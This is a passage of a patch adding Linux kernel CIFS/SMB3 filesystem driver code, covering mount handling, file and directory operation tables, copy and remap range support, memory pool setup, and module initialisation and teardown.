++		dput(dentry);
++		dentry = child;
++	} while (!IS_ERR(dentry));
++	kfree(full_path);
++	return dentry;
++}
++
++static int cifs_set_super(struct super_block *sb, void *data)
++{
++	struct cifs_mnt_data *mnt_data = data;
++	sb->s_fs_info = mnt_data->cifs_sb;
++	return set_anon_super(sb, NULL);
++}
++
++struct dentry *
++cifs_smb3_do_mount(struct file_system_type *fs_type,
++	      int flags, struct smb3_fs_context *old_ctx)
++{
++	int rc;
++	struct super_block *sb = NULL;
++	struct cifs_sb_info *cifs_sb = NULL;
++	struct cifs_mnt_data mnt_data;
++	struct dentry *root;
++
++	/*
++	 * Prints in Kernel / CIFS log the attempted mount operation
++	 *	If CIFS_DEBUG && cifs_FYI
++	 */
++	if (cifsFYI)
++		cifs_dbg(FYI, "Devname: %s flags: %d\n", old_ctx->UNC, flags);
++	else
++		cifs_info("Attempting to mount %s\n", old_ctx->UNC);
++
++	cifs_sb = kzalloc(sizeof(struct cifs_sb_info), GFP_KERNEL);
++	if (cifs_sb == NULL) {
++		root = ERR_PTR(-ENOMEM);
++		goto out;
++	}
++
++	cifs_sb->ctx = kzalloc(sizeof(struct smb3_fs_context), GFP_KERNEL);
++	if (!cifs_sb->ctx) {
++		root = ERR_PTR(-ENOMEM);
++		goto out;
++	}
++	rc = smb3_fs_context_dup(cifs_sb->ctx, old_ctx);
++	if (rc) {
++		root = ERR_PTR(rc);
++		goto out;
++	}
++
++	rc = cifs_setup_volume_info(cifs_sb->ctx, NULL, NULL);
++	if (rc) {
++		root = ERR_PTR(rc);
++		goto out;
++	}
++
++	rc = cifs_setup_cifs_sb(cifs_sb);
++	if (rc) {
++		root = ERR_PTR(rc);
++		goto out;
++	}
++
++	rc = cifs_mount(cifs_sb, cifs_sb->ctx);
++	if (rc) {
++		if (!(flags & SB_SILENT))
++			cifs_dbg(VFS, "cifs_mount failed w/return code = %d\n",
++				 rc);
++		root = ERR_PTR(rc);
++		goto out;
++	}
++
++	mnt_data.ctx = cifs_sb->ctx;
++	mnt_data.cifs_sb = cifs_sb;
++	mnt_data.flags = flags;
++
++	/* BB should we make this contingent on mount parm? */
++	flags |= SB_NODIRATIME | SB_NOATIME;
++
++	sb = sget(fs_type, cifs_match_super, cifs_set_super, flags, &mnt_data);
++	if (IS_ERR(sb)) {
++		root = ERR_CAST(sb);
++		cifs_umount(cifs_sb);
++		cifs_sb = NULL;
++		goto out;
++	}
++
++	if (sb->s_root) {
++		cifs_dbg(FYI, "Use existing superblock\n");
++		cifs_umount(cifs_sb);
++		cifs_sb = NULL;
++	} else {
++		rc = cifs_read_super(sb);
++		if (rc) {
++			root = ERR_PTR(rc);
++			goto out_super;
++		}
++
++		sb->s_flags |= SB_ACTIVE;
++	}
++
++	root = cifs_get_root(cifs_sb ? cifs_sb->ctx : old_ctx, sb);
++	if (IS_ERR(root))
++		goto out_super;
++
++	if (cifs_sb)
++		cifs_sb->root = dget(root);
++
++	cifs_dbg(FYI, "dentry root is: %p\n", root);
++	return root;
++
++out_super:
++	deactivate_locked_super(sb);
++	return root;
++out:
++	if (cifs_sb) {
++		if (!sb || IS_ERR(sb)) {  /* otherwise kill_sb will handle */
++			kfree(cifs_sb->prepath);
++			smb3_cleanup_fs_context(cifs_sb->ctx);
++			kfree(cifs_sb);
++		}
++	}
++	return root;
++}
++
++
++static ssize_t
++cifs_loose_read_iter(struct kiocb *iocb, struct iov_iter *iter)
++{
++	ssize_t rc;
++	struct inode *inode = file_inode(iocb->ki_filp);
++
++	if (iocb->ki_flags & IOCB_DIRECT)
++		return cifs_user_readv(iocb, iter);
++
++	rc = cifs_revalidate_mapping(inode);
++	if (rc)
++		return rc;
++
++	return generic_file_read_iter(iocb, iter);
++}
++
++static ssize_t cifs_file_write_iter(struct kiocb *iocb, struct iov_iter *from)
++{
++	struct inode *inode = file_inode(iocb->ki_filp);
++	struct cifsInodeInfo *cinode = CIFS_I(inode);
++	ssize_t written;
++	int rc;
++
++	if (iocb->ki_filp->f_flags & O_DIRECT) {
++		written = cifs_user_writev(iocb, from);
++		if (written > 0 && CIFS_CACHE_READ(cinode)) {
++			cifs_zap_mapping(inode);
++			cifs_dbg(FYI,
++				 "Set no oplock for inode=%p after a write operation\n",
++				 inode);
++			cinode->oplock = 0;
++		}
++		return written;
++	}
++
++	written = cifs_get_writer(cinode);
++	if (written)
++		return written;
++
++	written = generic_file_write_iter(iocb, from);
++
++	if (CIFS_CACHE_WRITE(CIFS_I(inode)))
++		goto out;
++
++	rc = filemap_fdatawrite(inode->i_mapping);
++	if (rc)
++		cifs_dbg(FYI, "cifs_file_write_iter: %d rc on %p inode\n",
++			 rc, inode);
++
++out:
++	cifs_put_writer(cinode);
++	return written;
++}
++
++static loff_t cifs_llseek(struct file *file, loff_t offset, int whence)
++{
++	struct cifsFileInfo *cfile = file->private_data;
++	struct cifs_tcon *tcon;
++
++	/*
++	 * whence == SEEK_END || SEEK_DATA || SEEK_HOLE => we must revalidate
++	 * the cached file length
++	 */
++	if (whence != SEEK_SET && whence != SEEK_CUR) {
++		int rc;
++		struct inode *inode = file_inode(file);
++
++		/*
++		 * We need to be sure that all dirty pages are written and the
++		 * server has the newest file length.
++		 */
++		if (!CIFS_CACHE_READ(CIFS_I(inode)) && inode->i_mapping &&
++		    inode->i_mapping->nrpages != 0) {
++			rc = filemap_fdatawait(inode->i_mapping);
++			if (rc) {
++				mapping_set_error(inode->i_mapping, rc);
++				return rc;
++			}
++		}
++		/*
++		 * Some applications poll for the file length in this strange
++		 * way so we must seek to end on non-oplocked files by
++		 * setting the revalidate time to zero.
++		 */
++		CIFS_I(inode)->time = 0;
++
++		rc = cifs_revalidate_file_attr(file);
++		if (rc < 0)
++			return (loff_t)rc;
++	}
++	if (cfile && cfile->tlink) {
++		tcon = tlink_tcon(cfile->tlink);
++		if (tcon->ses->server->ops->llseek)
++			return tcon->ses->server->ops->llseek(file, tcon,
++							      offset, whence);
++	}
++	return generic_file_llseek(file, offset, whence);
++}
++
++static int
++cifs_setlease(struct file *file, long arg, struct file_lock **lease, void **priv)
++{
++	/*
++	 * Note that this is called by vfs setlease with i_lock held to
++	 * protect *lease from going away.
++	 */
++	struct inode *inode = file_inode(file);
++	struct cifsFileInfo *cfile = file->private_data;
++
++	if (!(S_ISREG(inode->i_mode)))
++		return -EINVAL;
++
++	/* Check if file is oplocked if this is request for new lease */
++	if (arg == F_UNLCK ||
++	    ((arg == F_RDLCK) && CIFS_CACHE_READ(CIFS_I(inode))) ||
++	    ((arg == F_WRLCK) && CIFS_CACHE_WRITE(CIFS_I(inode))))
++		return generic_setlease(file, arg, lease, priv);
++	else if (tlink_tcon(cfile->tlink)->local_lease &&
++		 !CIFS_CACHE_READ(CIFS_I(inode)))
++		/*
++		 * If the server claims to support oplock on this file, then we
++		 * still need to check oplock even if the local_lease mount
++		 * option is set, but there are servers which do not support
++		 * oplock for which this mount option may be useful if the user
++		 * knows that the file won't be changed on the server by anyone
++		 * else.
++		 */
++		return generic_setlease(file, arg, lease, priv);
++	else
++		return -EAGAIN;
++}
++
++struct file_system_type cifs_fs_type = {
++	.owner = THIS_MODULE,
++	.name = "cifs",
++	.init_fs_context = smb3_init_fs_context,
++	.parameters = smb3_fs_parameters,
++	.kill_sb = cifs_kill_sb,
++	.fs_flags = FS_RENAME_DOES_D_MOVE,
++};
++MODULE_ALIAS_FS("cifs");
++
++struct file_system_type smb3_fs_type = {
++	.owner = THIS_MODULE,
++	.name = "smb3",
++	.init_fs_context = smb3_init_fs_context,
++	.parameters = smb3_fs_parameters,
++	.kill_sb = cifs_kill_sb,
++	.fs_flags = FS_RENAME_DOES_D_MOVE,
++};
++MODULE_ALIAS_FS("smb3");
++MODULE_ALIAS("smb3");
++
++const struct inode_operations cifs_dir_inode_ops = {
++	.create = cifs_create,
++	.atomic_open = cifs_atomic_open,
++	.lookup = cifs_lookup,
++	.getattr = cifs_getattr,
++	.unlink = cifs_unlink,
++	.link = cifs_hardlink,
++	.mkdir = cifs_mkdir,
++	.rmdir = cifs_rmdir,
++	.rename = cifs_rename2,
++	.permission = cifs_permission,
++	.setattr = cifs_setattr,
++	.symlink = cifs_symlink,
++	.mknod   = cifs_mknod,
++	.listxattr = cifs_listxattr,
++};
++
++const struct inode_operations cifs_file_inode_ops = {
++	.setattr = cifs_setattr,
++	.getattr = cifs_getattr,
++	.permission = cifs_permission,
++	.listxattr = cifs_listxattr,
++	.fiemap = cifs_fiemap,
++};
++
++const char *cifs_get_link(struct dentry *dentry, struct inode *inode,
++			    struct delayed_call *done)
++{
++	char *target_path;
++
++	target_path = kmalloc(PATH_MAX, GFP_KERNEL);
++	if (!target_path)
++		return ERR_PTR(-ENOMEM);
++
++	spin_lock(&inode->i_lock);
++	if (likely(CIFS_I(inode)->symlink_target)) {
++		strscpy(target_path, CIFS_I(inode)->symlink_target, PATH_MAX);
++	} else {
++		kfree(target_path);
++		target_path = ERR_PTR(-EOPNOTSUPP);
++	}
++	spin_unlock(&inode->i_lock);
++
++	if (!IS_ERR(target_path))
++		set_delayed_call(done, kfree_link, target_path);
++
++	return target_path;
++}
++
++const struct inode_operations cifs_symlink_inode_ops = {
++	.get_link = cifs_get_link,
++	.permission = cifs_permission,
++	.listxattr = cifs_listxattr,
++};
++
++static loff_t cifs_remap_file_range(struct file *src_file, loff_t off,
++		struct file *dst_file, loff_t destoff, loff_t len,
++		unsigned int remap_flags)
++{
++	struct inode *src_inode = file_inode(src_file);
++	struct inode *target_inode = file_inode(dst_file);
++	struct cifsFileInfo *smb_file_src = src_file->private_data;
++	struct cifsFileInfo *smb_file_target;
++	struct cifs_tcon *target_tcon;
++	unsigned int xid;
++	int rc;
++
++	if (remap_flags & ~(REMAP_FILE_DEDUP | REMAP_FILE_ADVISORY))
++		return -EINVAL;
++
++	cifs_dbg(FYI, "clone range\n");
++
++	xid = get_xid();
++
++	if (!src_file->private_data || !dst_file->private_data) {
++		rc = -EBADF;
++		cifs_dbg(VFS, "missing cifsFileInfo on copy range src file\n");
++		goto out;
++	}
++
++	smb_file_target = dst_file->private_data;
++	target_tcon = tlink_tcon(smb_file_target->tlink);
++
++	/*
++	 * Note: cifs case is easier than btrfs since server responsible for
++	 * checks for proper open modes and file type and if it wants
++	 * server could even support copy of range where source = target
++	 */
++	lock_two_nondirectories(target_inode, src_inode);
++
++	if (len == 0)
++		len = src_inode->i_size - off;
++
++	cifs_dbg(FYI, "about to flush pages\n");
++	/* should we flush first and last page first */
++	truncate_inode_pages_range(&target_inode->i_data, destoff,
++				   PAGE_ALIGN(destoff + len)-1);
++
++	if (target_tcon->ses->server->ops->duplicate_extents)
++		rc = target_tcon->ses->server->ops->duplicate_extents(xid,
++			smb_file_src, smb_file_target, off, len, destoff);
++	else
++		rc = -EOPNOTSUPP;
++
++	/* force revalidate of size and timestamps of target file now
++	   that target is updated on the server */
++	CIFS_I(target_inode)->time = 0;
++	/* although unlocking in the reverse order from locking is not
++	   strictly necessary here it is a little cleaner to be consistent */
++	unlock_two_nondirectories(src_inode, target_inode);
++out:
++	free_xid(xid);
++	return rc < 0 ? rc : len;
++}
++
++ssize_t cifs_file_copychunk_range(unsigned int xid,
++				struct file *src_file, loff_t off,
++				struct file *dst_file, loff_t destoff,
++				size_t len, unsigned int flags)
++{
++	struct inode *src_inode = file_inode(src_file);
++	struct inode *target_inode = file_inode(dst_file);
++	struct cifsFileInfo *smb_file_src;
++	struct cifsFileInfo *smb_file_target;
++	struct cifs_tcon *src_tcon;
++	struct cifs_tcon *target_tcon;
++	ssize_t rc;
++
++	cifs_dbg(FYI, "copychunk range\n");
++
++	if (!src_file->private_data || !dst_file->private_data) {
++		rc = -EBADF;
++		cifs_dbg(VFS, "missing cifsFileInfo on copy range src file\n");
++		goto out;
++	}
++
++	rc = -EXDEV;
++	smb_file_target = dst_file->private_data;
++	smb_file_src = src_file->private_data;
++	src_tcon = tlink_tcon(smb_file_src->tlink);
++	target_tcon = tlink_tcon(smb_file_target->tlink);
++
++	if (src_tcon->ses != target_tcon->ses) {
++		cifs_dbg(VFS, "source and target of copy not on same server\n");
++		goto out;
++	}
++
++	rc = -EOPNOTSUPP;
++	if (!target_tcon->ses->server->ops->copychunk_range)
++		goto out;
++
++	/*
++	 * Note: cifs case is easier than btrfs since server responsible for
++	 * checks for proper open modes and file type and if it wants
++	 * server could even support copy of range where source = target
++	 */
++	lock_two_nondirectories(target_inode, src_inode);
++
++	cifs_dbg(FYI, "about to flush pages\n");
++
++	rc = filemap_write_and_wait_range(src_inode->i_mapping, off,
++					  off + len - 1);
++	if (rc)
++		goto unlock;
++
++	/* should we flush first and last page first */
++	truncate_inode_pages(&target_inode->i_data, 0);
++
++	rc = file_modified(dst_file);
++	if (!rc)
++		rc = target_tcon->ses->server->ops->copychunk_range(xid,
++			smb_file_src, smb_file_target, off, len, destoff);
++
++	file_accessed(src_file);
++
++	/* force revalidate of size and timestamps of target file now
++	 * that target is updated on the server
++	 */
++	CIFS_I(target_inode)->time = 0;
++
++unlock:
++	/* although unlocking in the reverse order from locking is not
++	 * strictly necessary here it is a little cleaner to be consistent
++	 */
++	unlock_two_nondirectories(src_inode, target_inode);
++
++out:
++	return rc;
++}
++
++/*
++ * Directory operations under CIFS/SMB2/SMB3 are synchronous, so fsync()
++ * is a dummy operation.
++ */
++static int cifs_dir_fsync(struct file *file, loff_t start, loff_t end, int datasync)
++{
++	cifs_dbg(FYI, "Sync directory - name: %pD datasync: 0x%x\n",
++		 file, datasync);
++
++	return 0;
++}
++
++static ssize_t cifs_copy_file_range(struct file *src_file, loff_t off,
++				struct file *dst_file, loff_t destoff,
++				size_t len, unsigned int flags)
++{
++	unsigned int xid = get_xid();
++	ssize_t rc;
++	struct cifsFileInfo *cfile = dst_file->private_data;
++
++	if (cfile->swapfile) {
++		rc = -EOPNOTSUPP;
++		free_xid(xid);
++		return rc;
++	}
++
++	rc = cifs_file_copychunk_range(xid, src_file, off, dst_file, destoff,
++					len, flags);
++	free_xid(xid);
++
++	if (rc == -EOPNOTSUPP || rc == -EXDEV)
++		rc = generic_copy_file_range(src_file, off, dst_file,
++					     destoff, len, flags);
++	return rc;
++}
++
++const struct file_operations cifs_file_ops = {
++	.read_iter = cifs_loose_read_iter,
++	.write_iter = cifs_file_write_iter,
++	.open = cifs_open,
++	.release = cifs_close,
++	.lock = cifs_lock,
++	.flock = cifs_flock,
++	.fsync = cifs_fsync,
++	.flush = cifs_flush,
++	.mmap  = cifs_file_mmap,
++	.splice_read = generic_file_splice_read,
++	.splice_write = iter_file_splice_write,
++	.llseek = cifs_llseek,
++	.unlocked_ioctl	= cifs_ioctl,
++	.copy_file_range = cifs_copy_file_range,
++	.remap_file_range = cifs_remap_file_range,
++	.setlease = cifs_setlease,
++	.fallocate = cifs_fallocate,
++};
++
++const struct file_operations cifs_file_strict_ops = {
++	.read_iter = cifs_strict_readv,
++	.write_iter = cifs_strict_writev,
++	.open = cifs_open,
++	.release = cifs_close,
++	.lock = cifs_lock,
++	.flock = cifs_flock,
++	.fsync = cifs_strict_fsync,
++	.flush = cifs_flush,
++	.mmap = cifs_file_strict_mmap,
++	.splice_read = generic_file_splice_read,
++	.splice_write = iter_file_splice_write,
++	.llseek = cifs_llseek,
++	.unlocked_ioctl	= cifs_ioctl,
++	.copy_file_range = cifs_copy_file_range,
++	.remap_file_range = cifs_remap_file_range,
++	.setlease = cifs_setlease,
++	.fallocate = cifs_fallocate,
++};
++
++const struct file_operations cifs_file_direct_ops = {
++	.read_iter = cifs_direct_readv,
++	.write_iter = cifs_direct_writev,
++	.open = cifs_open,
++	.release = cifs_close,
++	.lock = cifs_lock,
++	.flock = cifs_flock,
++	.fsync = cifs_fsync,
++	.flush = cifs_flush,
++	.mmap = cifs_file_mmap,
++	.splice_read = generic_file_splice_read,
++	.splice_write = iter_file_splice_write,
++	.unlocked_ioctl  = cifs_ioctl,
++	.copy_file_range = cifs_copy_file_range,
++	.remap_file_range = cifs_remap_file_range,
++	.llseek = cifs_llseek,
++	.setlease = cifs_setlease,
++	.fallocate = cifs_fallocate,
++};
++
++const struct file_operations cifs_file_nobrl_ops = {
++	.read_iter = cifs_loose_read_iter,
++	.write_iter = cifs_file_write_iter,
++	.open = cifs_open,
++	.release = cifs_close,
++	.fsync = cifs_fsync,
++	.flush = cifs_flush,
++	.mmap  = cifs_file_mmap,
++	.splice_read = generic_file_splice_read,
++	.splice_write = iter_file_splice_write,
++	.llseek = cifs_llseek,
++	.unlocked_ioctl	= cifs_ioctl,
++	.copy_file_range = cifs_copy_file_range,
++	.remap_file_range = cifs_remap_file_range,
++	.setlease = cifs_setlease,
++	.fallocate = cifs_fallocate,
++};
++
++const struct file_operations cifs_file_strict_nobrl_ops = {
++	.read_iter = cifs_strict_readv,
++	.write_iter = cifs_strict_writev,
++	.open = cifs_open,
++	.release = cifs_close,
++	.fsync = cifs_strict_fsync,
++	.flush = cifs_flush,
++	.mmap = cifs_file_strict_mmap,
++	.splice_read = generic_file_splice_read,
++	.splice_write = iter_file_splice_write,
++	.llseek = cifs_llseek,
++	.unlocked_ioctl	= cifs_ioctl,
++	.copy_file_range = cifs_copy_file_range,
++	.remap_file_range = cifs_remap_file_range,
++	.setlease = cifs_setlease,
++	.fallocate = cifs_fallocate,
++};
++
++const struct file_operations cifs_file_direct_nobrl_ops = {
++	.read_iter = cifs_direct_readv,
++	.write_iter = cifs_direct_writev,
++	.open = cifs_open,
++	.release = cifs_close,
++	.fsync = cifs_fsync,
++	.flush = cifs_flush,
++	.mmap = cifs_file_mmap,
++	.splice_read = generic_file_splice_read,
++	.splice_write = iter_file_splice_write,
++	.unlocked_ioctl  = cifs_ioctl,
++	.copy_file_range = cifs_copy_file_range,
++	.remap_file_range = cifs_remap_file_range,
++	.llseek = cifs_llseek,
++	.setlease = cifs_setlease,
++	.fallocate = cifs_fallocate,
++};
++
++const struct file_operations cifs_dir_ops = {
++	.iterate_shared = cifs_readdir,
++	.release = cifs_closedir,
++	.read    = generic_read_dir,
++	.unlocked_ioctl  = cifs_ioctl,
++	.copy_file_range = cifs_copy_file_range,
++	.remap_file_range = cifs_remap_file_range,
++	.llseek = generic_file_llseek,
++	.fsync = cifs_dir_fsync,
++};
++
++static void
++cifs_init_once(void *inode)
++{
++	struct cifsInodeInfo *cifsi = inode;
++
++	inode_init_once(&cifsi->netfs.inode);
++	init_rwsem(&cifsi->lock_sem);
++}
++
++static int __init
++cifs_init_inodecache(void)
++{
++	cifs_inode_cachep = kmem_cache_create("cifs_inode_cache",
++					      sizeof(struct cifsInodeInfo),
++					      0, (SLAB_RECLAIM_ACCOUNT|
++						SLAB_MEM_SPREAD|SLAB_ACCOUNT),
++					      cifs_init_once);
++	if (cifs_inode_cachep == NULL)
++		return -ENOMEM;
++
++	return 0;
++}
++
++static void
++cifs_destroy_inodecache(void)
++{
++	/*
++	 * Make sure all delayed rcu free inodes are flushed before we
++	 * destroy cache.
++	 */
++	rcu_barrier();
++	kmem_cache_destroy(cifs_inode_cachep);
++}
++
++static int
++cifs_init_request_bufs(void)
++{
++	/*
++	 * SMB2 maximum header size is bigger than CIFS one - no problems to
++	 * allocate some more bytes for CIFS.
++	 */
++	size_t max_hdr_size = MAX_SMB2_HDR_SIZE;
++
++	if (CIFSMaxBufSize < 8192) {
++	/* Buffer size can not be smaller than 2 * PATH_MAX since maximum
++	Unicode path name has to fit in any SMB/CIFS path based frames */
++		CIFSMaxBufSize = 8192;
++	} else if (CIFSMaxBufSize > 1024*127) {
++		CIFSMaxBufSize = 1024 * 127;
++	} else {
++		CIFSMaxBufSize &= 0x1FE00; /* Round size to even 512 byte mult*/
++	}
++/*
++	cifs_dbg(VFS, "CIFSMaxBufSize %d 0x%x\n",
++		 CIFSMaxBufSize, CIFSMaxBufSize);
++*/
++	cifs_req_cachep = kmem_cache_create_usercopy("cifs_request",
++					    CIFSMaxBufSize + max_hdr_size, 0,
++					    SLAB_HWCACHE_ALIGN, 0,
++					    CIFSMaxBufSize + max_hdr_size,
++					    NULL);
++	if (cifs_req_cachep == NULL)
++		return -ENOMEM;
++
++	if (cifs_min_rcv < 1)
++		cifs_min_rcv = 1;
++	else if (cifs_min_rcv > 64) {
++		cifs_min_rcv = 64;
++		cifs_dbg(VFS, "cifs_min_rcv set to maximum (64)\n");
++	}
++
++	cifs_req_poolp = mempool_create_slab_pool(cifs_min_rcv,
++						  cifs_req_cachep);
++
++	if (cifs_req_poolp == NULL) {
++		kmem_cache_destroy(cifs_req_cachep);
++		return -ENOMEM;
++	}
++	/* MAX_CIFS_SMALL_BUFFER_SIZE bytes is enough for most SMB responses and
++	almost all handle based requests (but not write response, nor is it
++	sufficient for path based requests).  A smaller size would have
++	been more efficient (compacting multiple slab items on one 4k page)
++	for the case in which debug was on, but this larger size allows
++	more SMBs to use small buffer alloc and is still much more
++	efficient to alloc 1 per page off the slab compared to 17K (5page)
++	alloc of large cifs buffers even when page debugging is on */
++	cifs_sm_req_cachep = kmem_cache_create_usercopy("cifs_small_rq",
++			MAX_CIFS_SMALL_BUFFER_SIZE, 0, SLAB_HWCACHE_ALIGN,
++			0, MAX_CIFS_SMALL_BUFFER_SIZE, NULL);
++	if (cifs_sm_req_cachep == NULL) {
++		mempool_destroy(cifs_req_poolp);
++		kmem_cache_destroy(cifs_req_cachep);
++		return -ENOMEM;
++	}
++
++	if (cifs_min_small < 2)
++		cifs_min_small = 2;
++	else if (cifs_min_small > 256) {
++		cifs_min_small = 256;
++		cifs_dbg(FYI, "cifs_min_small set to maximum (256)\n");
++	}
++
++	cifs_sm_req_poolp = mempool_create_slab_pool(cifs_min_small,
++						     cifs_sm_req_cachep);
++
++	if (cifs_sm_req_poolp == NULL) {
++		mempool_destroy(cifs_req_poolp);
++		kmem_cache_destroy(cifs_req_cachep);
++		kmem_cache_destroy(cifs_sm_req_cachep);
++		return -ENOMEM;
++	}
++
++	return 0;
++}
++
++static void
++cifs_destroy_request_bufs(void)
++{
++	mempool_destroy(cifs_req_poolp);
++	kmem_cache_destroy(cifs_req_cachep);
++	mempool_destroy(cifs_sm_req_poolp);
++	kmem_cache_destroy(cifs_sm_req_cachep);
++}
++
++static int init_mids(void)
++{
++	cifs_mid_cachep = kmem_cache_create("cifs_mpx_ids",
++					    sizeof(struct mid_q_entry), 0,
++					    SLAB_HWCACHE_ALIGN, NULL);
++	if (cifs_mid_cachep == NULL)
++		return -ENOMEM;
++
++	/* 3 is a reasonable minimum number of simultaneous operations */
++	cifs_mid_poolp = mempool_create_slab_pool(3, cifs_mid_cachep);
++	if (cifs_mid_poolp == NULL) {
++		kmem_cache_destroy(cifs_mid_cachep);
++		return -ENOMEM;
++	}
++
++	return 0;
++}
++
++static void destroy_mids(void)
++{
++	mempool_destroy(cifs_mid_poolp);
++	kmem_cache_destroy(cifs_mid_cachep);
++}
++
++static int __init
++init_cifs(void)
++{
++	int rc = 0;
++	cifs_proc_init();
++	INIT_LIST_HEAD(&cifs_tcp_ses_list);
++/*
++ *  Initialize Global counters
++ */
++	atomic_set(&sesInfoAllocCount, 0);
++	atomic_set(&tconInfoAllocCount, 0);
++	atomic_set(&tcpSesNextId, 0);
++	atomic_set(&tcpSesAllocCount, 0);
++	atomic_set(&tcpSesReconnectCount, 0);
++	atomic_set(&tconInfoReconnectCount, 0);
++
++	atomic_set(&buf_alloc_count, 0);
++	atomic_set(&small_buf_alloc_count, 0);
++#ifdef CONFIG_CIFS_STATS2
++	atomic_set(&total_buf_alloc_count, 0);
++	atomic_set(&total_small_buf_alloc_count, 0);
++	if (slow_rsp_threshold < 1)
++		cifs_dbg(FYI, "slow_response_threshold msgs disabled\n");
++	else if (slow_rsp_threshold > 32767)
++		cifs_dbg(VFS,
++		       "slow response threshold set higher than recommended (0 to 32767)\n");
++#endif /* CONFIG_CIFS_STATS2 */
++
++	atomic_set(&mid_count, 0);
++	GlobalCurrentXid = 0;
++	GlobalTotalActiveXid = 0;
++	GlobalMaxActiveXid = 0;
++	spin_lock_init(&cifs_tcp_ses_lock);
++	spin_lock_init(&GlobalMid_Lock);
++
++	cifs_lock_secret = get_random_u32();
++
++	if (cifs_max_pending < 2) {
++		cifs_max_pending = 2;
++		cifs_dbg(FYI, "cifs_max_pending set to min of 2\n");
++	} else if (cifs_max_pending > CIFS_MAX_REQ) {
++		cifs_max_pending = CIFS_MAX_REQ;
++		cifs_dbg(FYI, "cifs_max_pending set to max of %u\n",
++			 CIFS_MAX_REQ);
++	}
++
++	cifsiod_wq = alloc_workqueue("cifsiod", WQ_FREEZABLE|WQ_MEM_RECLAIM, 0);
++	if (!cifsiod_wq) {
++		rc = -ENOMEM;
++		goto out_clean_proc;
++	}
++
++	/*
++	 * Consider in future setting limit!=0 maybe to min(num_of_cores - 1, 3)
++	 * so that we don't launch too many worker threads but
++	 * Documentation/core-api/workqueue.rst recommends setting it to 0
++	 */
++
++	/* WQ_UNBOUND allows decrypt tasks to run on any CPU */
++	decrypt_wq = alloc_workqueue("smb3decryptd",
++				     WQ_UNBOUND|WQ_FREEZABLE|WQ_MEM_RECLAIM, 0);
++	if (!decrypt_wq) {
++		rc = -ENOMEM;
++		goto out_destroy_cifsiod_wq;
++	}
++
++	fileinfo_put_wq = alloc_workqueue("cifsfileinfoput",
++				     WQ_UNBOUND|WQ_FREEZABLE|WQ_MEM_RECLAIM, 0);
++	if (!fileinfo_put_wq) {
++		rc = -ENOMEM;
++		goto out_destroy_decrypt_wq;
++	}
++
++	cifsoplockd_wq = alloc_workqueue("cifsoplockd",
++					 WQ_FREEZABLE|WQ_MEM_RECLAIM, 0);
++	if (!cifsoplockd_wq) {
++		rc = -ENOMEM;
++		goto out_destroy_fileinfo_put_wq;
++	}
++
++	deferredclose_wq = alloc_workqueue("deferredclose",
++					   WQ_FREEZABLE|WQ_MEM_RECLAIM, 0);
++	if (!deferredclose_wq) {
++		rc = -ENOMEM;
++		goto out_destroy_cifsoplockd_wq;
++	}
++
++	rc = cifs_init_inodecache();
++	if (rc)
++		goto out_destroy_deferredclose_wq;
++
++	rc = init_mids();
++	if (rc)
++		goto out_destroy_inodecache;
++
++	rc = cifs_init_request_bufs();
++	if (rc)
++		goto out_destroy_mids;
++
++#ifdef CONFIG_CIFS_DFS_UPCALL
++	rc = dfs_cache_init();
++	if (rc)
++		goto out_destroy_request_bufs;
++#endif /* CONFIG_CIFS_DFS_UPCALL */
++#ifdef CONFIG_CIFS_UPCALL
++	rc = init_cifs_spnego();
++	if (rc)
++		goto out_destroy_dfs_cache;
++#endif /* CONFIG_CIFS_UPCALL */
++#ifdef CONFIG_CIFS_SWN_UPCALL
++	rc = cifs_genl_init();
++	if (rc)
++		goto out_register_key_type;
++#endif /* CONFIG_CIFS_SWN_UPCALL */
++
++	rc = init_cifs_idmap();
++	if (rc)
++		goto out_cifs_swn_init;
++
++	rc = register_filesystem(&cifs_fs_type);
++	if (rc)
++		goto out_init_cifs_idmap;
++
++	rc = register_filesystem(&smb3_fs_type);
++	if (rc) {
++		unregister_filesystem(&cifs_fs_type);
++		goto out_init_cifs_idmap;
++	}
++
++	return 0;
++
++out_init_cifs_idmap:
++	exit_cifs_idmap();
++out_cifs_swn_init:
++#ifdef CONFIG_CIFS_SWN_UPCALL
++	cifs_genl_exit();
++out_register_key_type:
++#endif
++#ifdef CONFIG_CIFS_UPCALL
++	exit_cifs_spnego();
++out_destroy_dfs_cache:
++#endif
++#ifdef CONFIG_CIFS_DFS_UPCALL
++	dfs_cache_destroy();
++out_destroy_request_bufs:
++#endif
++	cifs_destroy_request_bufs();
++out_destroy_mids:
++	destroy_mids();
++out_destroy_inodecache:
++	cifs_destroy_inodecache();
++out_destroy_deferredclose_wq:
++	destroy_workqueue(deferredclose_wq);
++out_destroy_cifsoplockd_wq:
++	destroy_workqueue(cifsoplockd_wq);
++out_destroy_fileinfo_put_wq:
++	destroy_workqueue(fileinfo_put_wq);
++out_destroy_decrypt_wq:
++	destroy_workqueue(decrypt_wq);
++out_destroy_cifsiod_wq:
++	destroy_workqueue(cifsiod_wq);
++out_clean_proc:
++	cifs_proc_clean();
++	return rc;
++}
++
++static void __exit
++exit_cifs(void)
++{
++	cifs_dbg(NOISY, "exit_smb3\n");
++	unregister_filesystem(&cifs_fs_type);
++	unregister_filesystem(&smb3_fs_type);
++	cifs_dfs_release_automount_timer();
++	exit_cifs_idmap();
++#ifdef CONFIG_CIFS_SWN_UPCALL
++	cifs_genl_exit();
++#endif
++#ifdef CONFIG_CIFS_UPCALL
++	exit_cifs_spnego();
++#endif
++#ifdef CONFIG_CIFS_DFS_UPCALL
++	dfs_cache_destroy();
++#endif
++	cifs_destroy_request_bufs();
++	destroy_mids();
++	cifs_destroy_inodecache();
++	destroy_workqueue(deferredclose_wq);
++	destroy_workqueue(cifsoplockd_wq);
++	destroy_workqueue(decrypt_wq);
++	destroy_workqueue(fileinfo_put_wq);
++	destroy_workqueue(cifsiod_wq);
++	cifs_proc_clean();
++}
++
++MODULE_AUTHOR("Steve French");
++MODULE_LICENSE("GPL");	/* combination of LGPL + GPL source behaves as GPL */
++MODULE_DESCRIPTION
++	("VFS to access SMB3 servers e.g. Samba, Macs, Azure and Windows (and "
++	"also older servers complying with the SNIA CIFS Specification)");
++MODULE_VERSION(CIFS_VERSION);
++MODULE_SOFTDEP("ecb");
++MODULE_SOFTDEP("hmac");
++MODULE_SOFTDEP("md5");
++MODULE_SOFTDEP("nls");
++MODULE_SOFTDEP("aes");
++MODULE_SOFTDEP("cmac");
++MODULE_SOFTDEP("sha256");
++MODULE_SOFTDEP("sha512");
++MODULE_SOFTDEP("aead2");
++MODULE_SOFTDEP("ccm");
++MODULE_SOFTDEP("gcm");
++module_init(init_cifs)
++module_exit(exit_cifs)
